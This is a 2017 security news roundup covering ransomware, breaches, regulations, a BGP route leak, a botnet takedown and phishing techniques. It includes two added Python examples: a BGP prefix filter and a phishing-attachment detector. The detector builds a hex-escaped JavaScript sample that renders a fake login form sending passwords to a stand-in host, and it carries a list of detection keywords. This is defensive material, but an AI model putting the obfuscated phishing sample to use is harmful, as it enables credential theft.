IT Security News Blast 8-29-2017

When Becker County was hit with what appears to be a classic ransomware digital attack on its system last week, its backup system allowed it to ignore the ransom demand and restore its system, including its website, printers and internal system, basically within 24 hours. It took another day or two to get all the individual work stations up and running.

As scary as these examples are, the solution isn’t to stop seeking medical treatment. Patients can take some steps to protect their data and their privacy. One thing to do is a reference check on your insurer, hospital or health care provider by visiting the Office of Civil Rights’ list of providers that have experienced breaches, sometimes referred to as the “Wall of Shame.” Since July 1 alone, 35 breaches have been reported and are under investigation affecting more than 850,000 individuals.

The regulator set minimum cybersecurity standards for covered banks and financial institutions that aren’t “overly prescriptive,” so that companies can “match the relevant risks and keep pace with technological advances,” the rules say. However, data security attorneys and cybersecurity professionals told Bloomberg BNA that the rules are vague and lack clear compliance guidance, so they may actually hamper banks and financial institutions rather than help boost their security protections.

High-profile breaches like those that impacted HBO, Target and Home Depot are just three examples — but there are many others (too many to list for 2017 alone, and we still have roughly four-and-a-half months to go). As a result, we’re now seeing new regulations emerge that are forcing organizations to get their proverbial houses in order. These regulations feature a new characteristic: They’re hitting companies where it hurts, with steep penalties for those that don’t comply.

A California mortgage company is suing an insurer, claiming it refused coverage for a claim filed after a hacker stole more than $75,000 by impersonating the mortgage company’s former CEO. American Pacific Mortgage filed the lawsuit against Aspen Specialty Insurance Company in federal court, claiming the insurer must cover a claim resulting from the cyber attack.

Simply put, the regulation and other legislation to come will require insurance companies, brokers, and soon their lawyers, to change their management and corporate culture toward cybersecurity or face certain liability. For those insurers that conduct business in New York and have not yet taken action, time is running out. Here are five things that every insurance carrier, its general counsel and its board of directors should know about these new cybersecurity regulations.

Ship owners were warned about the threat of cyber-attacks only weeks before America began investigating the “possibility” that hackers caused the collision between one of its warships and an oil tanker, The Sunday Times can reveal. The International Maritime Organisation (IMO), a London-based UN-affiliated body that regulates shipping, last month published guidelines urging ship owners to safeguard vessels against the “current and emerging threats” of cyber-hacking.

Yu is accused of selling the Sakula malware that was used in the OPM attack. Sakula was at that time a very rare piece of malware indeed, which is just what you need to stay under the radar. Yu, a Chinese national from Shanghai, was apparently arrested at Los Angeles airport after attending a conference in the US.

In the weeks leading up to the Charlottesville, Virginia white nationalist march that left one counterprotestor dead, organizers discussed inserting screws into flagpoles to be used as potential weapons and concealing firearms in the case of a “gunfight,” according to chatroom logs. In the days after the march, participants in the same chatroom created a meme from a photo of a car that struck and killed Heather Heyer, describing the incident as “Back to the Fhurer.”

Several members of the National Infrastructure Advisory Council (NIAC), a Homeland Security advisory body, resigned last week. An unsigned resignation letter obtained by Nextgov gives several reasons for the resignation, including the Trump administration’s lack of attentiveness to critical infrastructure and President Trump’s recent comments in the wake of unrest in Charlottesville. […] A majority of security analysts say the US is likely to suffer a cyberattack targeting infrastructure in the next two years, making the NIAC’s role a critical one. Eight members of the 28-member council resigned last week, which should be enough to make any security professional concerned for the security of US infrastructure.

A few years into my career, I still see myself as an oddball: I rock platinum blonde hair, write bad malware pick-up lines, secretly place unicorns throughout my error code to add some flair, and love graphic design just as much as coding. In the cybersecurity industry though, I fit right in. By becoming an expert in my field and exceeding expectations, I’ve pushed my peers to overlook my gender and solely respect my ability to do the work and get the job done. You see, behind the computer screen, your gender and superficial characteristics don’t matter. Hackers have no identity; they’re anonymous. It’s the work you produce that earns you respect among peers.

Women in cybersecurity: IBM wants to send you to a hacker conference for free

“Improving the diversity of the cybersecurity workforce is essential to overcoming the growing threats and challenges facing the industry – and supporting growth opportunities for women in this field is a critical part of that equation,” said Diane Delaney, worldwide talent manager at IBM Security, in a press release. “By providing scholarships at conferences like this, IBM hopes that more women will be encouraged to attend the event and stay up to speed on the latest trends and techniques which will help them become even more successful in the field.”

Security researchers at Moscow-based Positive Technologies have identified an undocumented configuration setting that disables Intel Management Engine 11, a CPU control mechanism that has been described as a security risk. […] If compromised, it becomes a backdoor, giving an attacker control over the affected device. That possibility set off alarms in May, with the disclosure of a vulnerability in Intel’s Active Management Technology, a firmware application that runs on the Intel ME.

It appears Apple has taken this sticky civil liberties situation into account in iOS 11, which features a new setting where tapping the power button five times brings up the option to make an emergency call, and disables Touch ID until the user enters their password. Discreet! And another potential front in the ongoing disputes between Apple and law enforcement, though we’ll have to wait at least until iOS 11’s official release this fall to see the full legal ramifications.

Under the scheme, up to three wirelessly connected heavy goods vehicles will move in a platoon, with acceleration and braking controlled by the lead vehicle. The lorries would still be steered by drivers. The report, commissioned by the Department for Transport, concludes that the system has the potential to reduce accidents and emissions, while improving traffic flow. But it also outlines 20 risks, including cyber-attack and the potential for drivers in the middle and back vehicles to lose concentration.

Businesses are increasingly transferring their data to cloud servers due to flexibility and cost savings, the report stated. The cloud security market includes products and solutions focused on the security of compliance, governance, and data protection. Cloud identity and access management tools were the most widely used, according to the report, accounting for the largest market share at $287.3 million. Email and web security came in second place, and these solutions have increased across many enterprises due to the rise of malware and ransomware in particular.

Commenting on the need for scalability and flexibility in your cybersecurity posture, Sowell says, “A cyberactor may be on somebody’s network for a year and a half without being detected. If you’re only keeping a month’s data, that’s a real problem.” Sowell explained AI’s role in understanding user activity on your network to detect anomalies and prevent data loss. Hortonworks has been actively working with the open source community on a cyber security framework, Apache Metron, that was designed to detect these anomalies at scale and that allows organizations to quickly respond to threats.

A collaboration between leading content delivery networks and technology companies—some of them competitors—is in the midst of shutting down the largest botnet of mobile devices ever recorded. The WireX botnet was detected on Aug. 17 after businesses in a number of industries, most notably hospitality, porn and gambling, as well as domain registrars, reported signs of substantial distributed denial of service attacks.

Last Friday, someone in Google fat-thumbed a border gateway protocol (BGP) advertisement and sent Japanese Internet traffic into a black hole. The trouble began when The Chocolate Factory “leaked” a big route table to Verizon, the result of which was traffic from Japanese giants like NTT and KDDI was sent to Google on the expectation it would be treated as transit. Since Google doesn’t provide transit services, as BGP Mon explains, that traffic either filled a link beyond its capacity, or hit an access control list, and disappeared.
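The leak above propagated because the receiving side accepted a peer's announcements for prefixes that peer does not originate. The following is an added illustration of the peer-side defence (prefix filtering plus a max-prefix limit); it is not code from the article, from Google, Verizon or BGPmon, and every AS number and prefix in it is a documentation placeholder constructed for the example, not real routing data.

```python
"""Peer-side filtering that stops a leaked route table from being installed.

Added example, not from the article: models a network that peers with a
content provider and (1) accepts only prefixes that provider is registered
to originate and (2) tears the session down when the announcement count
exceeds an agreed maximum. In practice the allowed list would be built from
IRR route objects or RPKI ROAs; here it is a constructed placeholder.
"""
import ipaddress
from dataclasses import dataclass, field


@dataclass
class PeerPolicy:
    peer_as: int          # AS we expect as origin (constructed placeholder)
    allowed: list         # prefixes that AS is registered to originate
    max_prefix: int       # hard limit on announcements per session


@dataclass
class FilterResult:
    accepted: list = field(default_factory=list)
    rejected: list = field(default_factory=list)
    session_down: bool = False


def covered(prefix, allowed):
    """True when prefix equals, or is a more-specific of, an allowed prefix."""
    return any(prefix.subnet_of(a) for a in allowed if a.version == prefix.version)


def filter_announcements(policy, announcements):
    """announcements: list of (prefix_str, as_path) with origin AS last."""
    result = FilterResult()
    allowed = [ipaddress.ip_network(p) for p in policy.allowed]
    for prefix_str, as_path in announcements:
        prefix = ipaddress.ip_network(prefix_str)
        # A leaked route keeps its original origin AS; the peer merely shows
        # up as a transit hop in front of it, so the origin check catches it.
        origin_ok = as_path[-1] == policy.peer_as
        if origin_ok and covered(prefix, allowed):
            result.accepted.append(prefix_str)
        else:
            result.rejected.append(prefix_str)
        if len(result.accepted) + len(result.rejected) > policy.max_prefix:
            # max-prefix exceeded: drop the session rather than keep
            # processing whatever a mis-configured peer sends.
            result.session_down = True
            break
    return result


# Constructed policy and announcements using RFC 5398 / RFC 5737 / RFC 3849
# documentation ASNs and prefixes (placeholders, not real operators).
POLICY = PeerPolicy(peer_as=64500,
                    allowed=["192.0.2.0/24", "2001:db8::/32"],
                    max_prefix=5)
LEGIT = [("192.0.2.0/24", [64500]), ("2001:db8::/32", [64500])]
# A "leak": the peer re-advertises routes it learned from other networks.
LEAK = LEGIT + [
    ("198.51.100.0/24", [64500, 64501]),
    ("203.0.113.0/25", [64500, 64502]),
    ("203.0.113.128/25", [64500, 64502]),
    ("192.0.2.0/25", [64500, 64503]),   # covered prefix but wrong origin
]

if __name__ == "__main__":
    print("normal:", filter_announcements(POLICY, LEGIT))
    print("leak:  ", filter_announcements(POLICY, LEAK))
```

The origin check and the prefix list are both needed: a more-specific of an allowed prefix with a foreign origin (the last constructed entry) passes the coverage test but fails the origin test, and the max-prefix limit is the backstop for the case where a full table arrives faster than any filter can be reasoned about.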

Tech support scam victims lost $120 million—and will get $10 million back

The FTC later won big court judgments against the companies involved, but the defendants didn’t have enough money left to pay up. One monetary judgment of $29.5 million was suspended because of the defendants’ financial condition. But the FTC was able to recover $10 million in a December 2016 settlement with defendants including Inbound Call Experts, a company also known as Advanced Tech Support. A previous settlement with companies accused of generating leads for the telemarketers brought in $258,000.

The first method involves emails with an HTML attachment that contain a small excerpt of JavaScript that is obscured in hexadecimal escape characters. “Therefore, no links are visible, but when opened, it presents a locally-generated phishing page with login instructions,” the company explains in an Aug. 24 blog post. […] [The] attack that abuses SharePoint generally involves an email that leverages “a genuine invoice from a commonly used online site, with a publicly open link to Office 365 SharePoint,” which is a web-based, collaborative platform for Microsoft Office users. Clicking the link executes a JavaScript-based file that infects the endpoint.
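The first method above hides its script body behind hexadecimal escape characters so that no link is visible in the attachment. As an added example, not code from the article or from the vendor it quotes, the following triage script shows how a mail gateway or analyst tooling can surface that pattern: it finds long runs of `\xNN` escapes inside `<script>` blocks, decodes them, and reports whether the decoded text builds a page or a credential form. The sample attachments, the eight-escape run threshold and the escape-ratio threshold are assumptions constructed for this example.

```python
"""Triage an HTML e-mail attachment for hex-escaped JavaScript.

Added example (not from the article): surfaces script bodies made of
\\xNN escapes and reports what they decode to, so a reviewer sees the
"locally-generated phishing page" without opening the attachment.
"""
import re

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Eight or more consecutive \xNN escapes is unusual in hand-written page
# scripts; the threshold is an assumption chosen for this example.
HEX_RUN_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")
# Decoded strings that point at dynamic page construction or credential
# capture. Matched case-insensitively against the decoded text.
INDICATORS = ("document.write", "<form", "password", "login",
              "eval(", "unescape(", "location")


def decode_hex_run(run: str) -> str:
    """Turn a '\\x64\\x6f...' run back into text."""
    pairs = re.findall(r"\\x([0-9a-fA-F]{2})", run)
    return bytes.fromhex("".join(pairs)).decode("latin-1")


def analyze_html(attachment: str, escape_ratio_threshold: float = 0.5) -> dict:
    """Return a triage verdict for one HTML attachment body."""
    findings = {"scripts": 0, "hex_runs": 0, "escape_ratio": 0.0,
                "indicators": [], "suspicious": False}
    escaped_chars = 0
    script_chars = 0
    for body in SCRIPT_RE.findall(attachment):
        findings["scripts"] += 1
        script_chars += len(body)
        for run in HEX_RUN_RE.findall(body):
            findings["hex_runs"] += 1
            escaped_chars += len(run)
            decoded = decode_hex_run(run).lower()
            for word in INDICATORS:
                if word in decoded and word not in findings["indicators"]:
                    findings["indicators"].append(word)
    if script_chars:
        findings["escape_ratio"] = escaped_chars / script_chars
    # Flag only when most of the script is escapes AND the decoded text looks
    # like page construction or a credential form; either alone is weaker.
    findings["suspicious"] = (
        findings["hex_runs"] > 0
        and findings["escape_ratio"] >= escape_ratio_threshold
        and bool(findings["indicators"])
    )
    return findings


def hex_escape(text: str) -> str:
    """Encode text as JavaScript \\xNN escapes (used here only to build the sample)."""
    return "".join(f"\\x{b:02x}" for b in text.encode("latin-1"))


# Constructed sample (not a real capture): the script writes a fake login
# form from a hex-escaped string, so no URL appears in the raw attachment.
_PHISH_JS = ('document.write("<form action=\'https://phish.example\'>'
             '<input name=password></form>")')
SAMPLE_ATTACHMENT = ("<html><body><script>eval(\"" + hex_escape(_PHISH_JS)
                     + "\");</script></body></html>")
# Constructed benign attachment for comparison.
BENIGN_ATTACHMENT = ("<html><body><script>var x = 1; console.log(x);</script>"
                     "<p>Invoice</p></body></html>")

if __name__ == "__main__":
    for name, doc in (("phish", SAMPLE_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        print(name, analyze_html(doc))
```

Decoding the escapes rather than only counting them matters for triage: the decoded text (here `document.write`, `<form` and `password`) is what tells a reviewer that the attachment renders a login page, and it is also what a link-scanning gateway never sees in the raw attachment.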

Some pet shops are still reporting low stocks of Royal Canin after the company’s headquarters in France were attacked by hackers on June 27. […] Shortages have been reported across London and the Home Counties. At one pet shop in Sydenham, south London, customers were faced with a two-week wait for kitten food. It is understood that the hack on Royal Canin’s servers has also affected supplies of dog food. James Wellbeloved, which also makes pet food and is owned by Mars, is also thought to be affected.


About Critical Informatics

We are world-class information security professionals providing Managed Detection and Response services to help you be secure, compliant, and resilient against threats to the life safety, life-sustaining, and quality-of-life systems and services you provide to clients, customers, constituents, and communities.